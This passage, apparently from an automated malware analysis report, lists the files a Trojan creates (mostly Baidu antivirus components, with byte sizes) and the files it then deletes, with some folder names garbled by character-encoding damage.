%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDShellExt64.dll (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDownloadProtect_x64.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\down.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ToastLogo.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMRepMgr.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdBugRpt.exe (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepMgr.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\blacksign.dat (852 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ad.dll (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMPerfMon.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\app.ico (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\scan_mgr_config.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\FileMon.dll (18424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\jieya_button.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDLogicUtils.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSd.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\dnw.xml (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (971 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMPatchAgent.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdRepair.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\up.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\CompatibilityChecker.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\901.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\mennu_narrow.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\check-box.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\tips.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdRepair.exe (13584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMAVE.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014101620141017\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\TrustAndIso.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMReport.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\check-box_focus.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrA1.tmp (878340 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KavUpdate.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMDownload.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\TrayPluginContainerConfig.xml (945 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray.rdb (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMNet.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (484 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMUpdate.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdSvc.exe (15536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\PrivacyProtect.dll (6360 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\systemfile.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMTinyXml.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\input_01.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\img_01.png (24 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat (480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\baidusdRepair.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDPerflog.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVEng.dll (22192 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMLog.dll (32 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\CompatibilityChecker.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdUpdate.exe (19152 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\BDMSkin.dll (37025 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDPerflog.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVE.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bdmp.dat (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdTray.exe (46916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVLogs.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMLog.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDConfig.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BSRLib.dat (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSREng.dll (9608 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\All Users\Desktop\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (959 bytes)

The Trojan deletes the following file(s):

%Program Files%\s12o (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ieBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMMsg.dll (0 bytes)
C:\s12o (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDAVCScan.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\hips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\HIPS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\npBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMRepBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMStringUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\dnw.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslA0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
